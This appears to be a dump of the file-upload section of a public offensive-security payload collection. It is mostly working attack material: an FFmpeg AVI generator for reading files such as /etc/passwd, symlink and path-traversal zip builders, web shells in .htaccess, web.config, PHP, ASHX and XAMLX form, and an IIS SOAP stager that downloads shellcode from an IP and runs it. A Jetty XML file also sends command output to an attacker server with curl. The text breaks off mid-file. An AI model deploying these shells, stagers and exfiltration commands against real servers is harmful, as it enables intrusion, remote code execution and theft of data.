https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Type Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE FFmpeg HLS/gen_avi_bypass.py:
--------------------------------------------------------------------------------
 1 | import struct
 2 | import argparse
 3 | 
 4 | AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST    movi"
 5 | 
 6 | 
 7 | def make_txt_packet(content, fake_packets=50, fake_packet_len=200):
 8 |     content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content
 9 |     packet = b'00tx' + struct.pack('<I', len(content)) + content
10 |     dcpkt = b'00dc' + struct.pack('<I', fake_packet_len) + b'\x00' * fake_packet_len
11 |     return packet + dcpkt * fake_packets
12 | 
13 | TXT_PLAYLIST = """#EXTM3U
14 | #EXT-X-MEDIA-SEQUENCE:0
15 | #EXTINF:1.0,
16 | #EXT-X-BYTERANGE: 0
17 | {txt}
18 | #EXTINF:1.0,
19 | {file}
20 | #EXT-X-ENDLIST"""
21 | 
22 | def prepare_txt_packet(txt, filename):
23 |     return make_txt_packet(TXT_PLAYLIST.format(txt=txt, file=filename).encode())
24 | 
25 | # TXT_LIST = ['/usr/share/doc/gnupg/Upgrading_From_PGP.txt', '/usr/share/doc/mount/mount.txt', '/etc/pki/nssdb/pkcs11.txt', '/usr/share/gnupg/help.txt']
26 | 
27 | if __name__ == "__main__":
28 |     parser = argparse.ArgumentParser('HLS AVI TXT exploit generator')
29 |     parser.add_argument('filename', help='file that should be read from conversion instance')
30 |     parser.add_argument('output_avi', help='where to save the avi')
31 |     parser.add_argument('--txt', help='any .txt file that exist on target system', default='GOD.txt')
32 |     args = parser.parse_args()
33 |     avi = AVI_HEADER + prepare_txt_packet(args.txt, args.filename)
34 |     output_name = args.output_avi
35 | 
36 |     with open(output_name, 'wb') as f:
37 |         f.write(avi)
38 | 
39 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE FFmpeg HLS/read_passwd.avi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/CVE FFmpeg HLS/read_passwd.avi


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE FFmpeg HLS/read_passwd_bypass.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/CVE FFmpeg HLS/read_passwd_bypass.mp4


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE FFmpeg HLS/read_shadow.avi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/CVE FFmpeg HLS/read_shadow.avi


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE FFmpeg HLS/read_shadow_bypass.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/CVE FFmpeg HLS/read_shadow_bypass.mp4


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE ZIP Symbolic Link/generate.sh:
--------------------------------------------------------------------------------
1 | ln -s /etc/passwd link
2 | zip --symlinks test.zip link
3 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/CVE ZIP Symbolic Link/passwd:
--------------------------------------------------------------------------------
1 | /etc/passwd


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Apache .htaccess/.htaccess:
--------------------------------------------------------------------------------
 1 | # Self contained .htaccess web shell - Part of the htshell project
 2 | # Written by Wireghoul - http://www.justanotherhacker.com
 3 | 
 4 | # Override default deny rule to make .htaccess file accessible over web
 5 | <Files ~ "^\.ht">
 6 | Order allow,deny
 7 | Allow from all
 8 | </Files>
 9 | 
10 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
11 | # the apache directoves from the .htaccess file
12 | AddType application/x-httpd-php .htaccess
13 | 
14 | ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
15 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo:
--------------------------------------------------------------------------------
1 | AddType application/x-httpd-php .htaccess
2 | # <?php phpinfo(); ?>
3 | SetHandler server-status
4 | SetHandler server-info
5 | 
6 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files:
--------------------------------------------------------------------------------
1 | AddType application/x-httpd-php .rce


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell:
--------------------------------------------------------------------------------
 1 | # htaccess backdoor shell
 2 | # this is relatively stealthy compared to a typical webshell
 3 | 
 4 | # overriding deny rule
 5 | # making htaccess accessible from the internet
 6 | # without this you'll get a HTTP 403
 7 | <Files ~ "^\.ht">
 8 | Require all granted
 9 | Order allow,deny
10 | Allow from all
11 | </Files>
12 | 
13 | # Make the server treat .htaccess file as .php file
14 | AddType application/x-httpd-php .htaccess
15 | 
16 | # <?php system($_GET['cmd']); ?>
17 | 
18 | # To execute commands you would navigate to:
19 | # http://vulnerable.com/.htaccess?cmd=YourCommand
20 | 
21 | # If system(); isnt working then try other syscalls
22 | # e.g. passthru(); shell_exec(); etc
23 | # If you still cant execute syscalls, try bypassing php.ini via htaccess
24 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration IIS web.config/web.config:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <configuration>
 3 |    <system.webServer>
 4 |       <handlers accessPolicy="Read, Script, Write">
 5 |          <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
 6 |       </handlers>
 7 |       <security>
 8 |          <requestFiltering>
 9 |             <fileExtensions>
10 |                <remove fileExtension=".config" />
11 |             </fileExtensions>
12 |             <hiddenSegments>
13 |                <remove segment="web.config" />
14 |             </hiddenSegments>
15 |          </requestFiltering>
16 |       </security>
17 |    </system.webServer>
18 | </configuration>
19 | <!--
20 | <% Response.write("-"&"->")%>
21 | <%
22 | Set oScript = Server.CreateObject("WSCRIPT.SHELL")
23 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
24 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
25 | 
26 | Function getCommandOutput(theCommand)
27 |     Dim objShell, objCmdExec
28 |     Set objShell = CreateObject("WScript.Shell")
29 |     Set objCmdExec = objshell.exec(thecommand)
30 | 
31 |     getCommandOutput = objCmdExec.StdOut.ReadAll
32 | end Function
33 | %>
34 | 
35 | <BODY>
36 | <FORM action="" method="GET">
37 | <input type="text" name="cmd" size=45 value="<%= szCMD %>">
38 | <input type="submit" value="Run">
39 | </FORM>
40 | 
41 | <PRE>
42 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
43 | <%Response.Write(Request.ServerVariables("server_name"))%>
44 | <p>
45 | <b>The server's port:</b>
46 | <%Response.Write(Request.ServerVariables("server_port"))%>
47 | </p>
48 | <p>
49 | <b>The server's software:</b>
50 | <%Response.Write(Request.ServerVariables("server_software"))%>
51 | </p>
52 | <p>
53 | <b>The server's software:</b>
54 | <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
55 | <% szCMD = request("cmd")
56 | thisDir = getCommandOutput("cmd /c" & szCMD)
57 | Response.Write(thisDir)%>
58 | </p>
59 | <br>
60 | </BODY>
61 | 
62 | 
63 | 
64 | <%Response.write("<!-"&"-") %>
65 | -->
66 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py:
--------------------------------------------------------------------------------
 1 | # Generating "evil" zip file
 2 | # Based on the work of Ajin Abraham
 3 | # Vuln website : https://github.com/ajinabraham/bad_python_extract
 4 | # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
 5 | 
 6 | # Warning 1: need a restart from the server OR debug=True
 7 | # Warning 2: you won't get the output of the command (blind rce)
 8 | import zipfile
 9 | 
10 | directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
11 | for d in directories:
12 |     name = "python-"+d+"-__init__.py.zip"
13 |     zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
14 |     zipf.close()
15 |     z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
16 |     z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
17 |     z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
18 |     z_info.external_attr = 0o777 << 16
19 |     z_file.close()
20 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip


--------------------------------------------------------------------------------
/Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini:
--------------------------------------------------------------------------------
 1 | [uwsgi]
 2 | ; read from a symbol
 3 | foo = @(sym://uwsgi_funny_function)
 4 | ; read from binary appended data
 5 | bar = @(data://[REDACTED])
 6 | ; read from http
 7 | test = @(http://[REDACTED])
 8 | ; read from a file descriptor
 9 | content = @(fd://[REDACTED])
10 | ; read from a process stdout
11 | body = @(exec://whoami)
12 | ; call a function returning a char *
13 | characters = @(call://uwsgi_func)


--------------------------------------------------------------------------------
/Upload Insecure Files/EICAR/eicar.txt:
--------------------------------------------------------------------------------
1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.ashx:
--------------------------------------------------------------------------------
 1 | <% @ webhandler language="C#" class="AverageHandler" %>
 2 | 
 3 | using System;
 4 | using System.Web;
 5 | using System.Diagnostics;
 6 | using System.IO;
 7 | 
 8 | public class AverageHandler : IHttpHandler
 9 | {
10 |   /* .Net requires this to be implemented */
11 |   public bool IsReusable
12 |   {
13 |     get { return true; }
14 |   }
15 | 
16 |   /* main executing code */
17 |   public void ProcessRequest(HttpContext ctx)
18 |   {
19 |     Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" +   HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
20 |     string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
21 | 
22 |     ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'></form>");
23 |     ctx.Response.Write("<hr>");
24 |     ctx.Response.Write("<pre>");
25 | 
26 |     /* command execution and output retrieval */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("</pre>");
39 |     ctx.Response.Write("<hr>");
40 |     ctx.Response.Write("By <a href='http://www.twitter.com/Hypn'>@Hypn</a>, for educational purposes only.");
41 |  }
42 | }
43 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.soap:
--------------------------------------------------------------------------------
 1 | <%@ WebService Language="C#" class="SoapStager"%>
 2 | using System;
 3 | using System.IO;
 4 | using System.Web;
 5 | using System.Web.Services;
 6 | using System.Net;
 7 | using System.Net.NetworkInformation;
 8 | using System.Net.Security;
 9 | 
10 | // SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap
11 | // https://github.com/0xbad53c/webshells/tree/main/iis
12 | 
13 | [WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")]
14 | [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
15 | public class SoapStager : MarshalByRefObject
16 | {
17 | 	private static Int32 MEM_COMMIT=0x1000;
18 | 	private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
19 | 
20 | 	[System.Runtime.InteropServices.DllImport("kernel32")]
21 | 	private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
22 | 
23 | 	[System.Runtime.InteropServices.DllImport("kernel32")]
24 | 	private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
25 | 
26 | 
27 |     [System.ComponentModel.ToolboxItem(false)]
28 |     [WebMethod]
29 |     public string loadStage()
30 |     {
31 |         string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode
32 |         byte[] rzjUFlLZh;
33 | 
34 |         IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy;
35 |         defaultWebProxy.Credentials = CredentialCache.DefaultCredentials;
36 | 
37 |         // in case of HTTPS
38 |         using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy })
39 |         {
40 |             ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
41 |             ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; });
42 |             webClient.UseDefaultCredentials = true;
43 |             rzjUFlLZh = webClient.DownloadData(Url);
44 |         }
45 | 
46 | 
47 |         // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion
48 |         IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
49 |         System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length);
50 |         IntPtr owlqRoQI_ms = IntPtr.Zero;
51 |         IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms);
52 | 
53 |         return "finished";
54 |     }
55 | }


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.xamlx:
--------------------------------------------------------------------------------
 1 | <WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
 2 |  <p:Sequence DisplayName="Sequential Service">
 3 |  <TransactedReceiveScope Request="{x:Reference __r0}">
 4 |  <p1:Sequence >
 5 |  <SendReply DisplayName="SendResponse" >
 6 |  <SendReply.Request>
 7 |  <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
 8 |  </SendReply.Request>
 9 |  <SendMessageContent>
10 |  <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]</p1:InArgument>
11 |  </SendMessageContent>
12 |  </SendReply>
13 |  </p1:Sequence>
14 |  </TransactedReceiveScope>
15 |  </p:Sequence>
16 | </WorkflowService>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension HTML/xss.html:
--------------------------------------------------------------------------------
1 | <script>alert('XSS')</script>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/extensions.lst:
--------------------------------------------------------------------------------
 1 | .jpeg.php
 2 | .jpg.php
 3 | .png.php
 4 | .php
 5 | .php3
 6 | .php4
 7 | .php5
 8 | .php7
 9 | .php8
10 | .pht
11 | .phar
12 | .phpt
13 | .pgif
14 | .phtml
15 | .phtm
16 | .php%00.gif
17 | .php\x00.gif
18 | .php%00.png
19 | .php\x00.png
20 | .php%00.jpg
21 | .php\x00.jpg
22 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/php-script-tag.php:
--------------------------------------------------------------------------------
1 | <script language="php">system("id");</script>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.jpg.php:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phar:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php3:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php4:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php5:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php7:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.php8:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phpt:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.pht:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/phpinfo.phtml:
--------------------------------------------------------------------------------
1 | <?php phpinfo(); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.gif^shell.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpeg.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpg.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpg^shell.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.pgif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Extension PHP/shell.pgif


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phar:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php3:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php4:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php5:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php7:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phpt:
--------------------------------------------------------------------------------
1 | --TEST--
2 | echo - basic test for echo language construct
3 | --FILE--
4 | <?php
5 | echo 'This works ', 'and takes args!';
6 | echo "Shell";system($_GET['cmd']);
7 | ?>
8 | --EXPECT--
9 | This works and takes args!


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.pht:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phtml:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.png.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.png^shell.php:
--------------------------------------------------------------------------------
1 | <?php echo "Shell";system($_GET['cmd']); ?>
2 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/tiny.php:
--------------------------------------------------------------------------------
1 | <?=`$_GET[0]`?>
2 | <!-- tiny.php?0=ls -->


--------------------------------------------------------------------------------
/Upload Insecure Files/Images/file-upload-mindmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Images/file-upload-mindmap.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Jetty RCE/JettyShell.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0"?>
 2 | <!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
 3 | <Configure class="org.eclipse.jetty.server.handler.ContextHandler">
 4 |     <Call class="java.lang.Runtime" name="getRuntime">
 5 |         <Call name="exec">
 6 |             <Arg>
 7 |                 <Array type="String">
 8 |                     <Item>/bin/sh</Item>
 9 |                     <Item>-c</Item>
10 |                     <Item>curl -F "r=`id`" http://yourServer:1337/</Item>
11 |                 </Array>
12 |             </Arg>
13 |         </Call>
14 |     </Call>
15 | </Configure>


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/GIF_exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/GIF_exploit.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/JPG_exploit-55.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/PNG_110x110_resize_bypass_use_LFI.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Compression/PNG_32x32_resize_bypass_use_LFI.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/createCompressedPNG_110x110.php:
--------------------------------------------------------------------------------
 1 | <?
 2 |  
 3 | header('Content-Type: image/png');
 4 |  
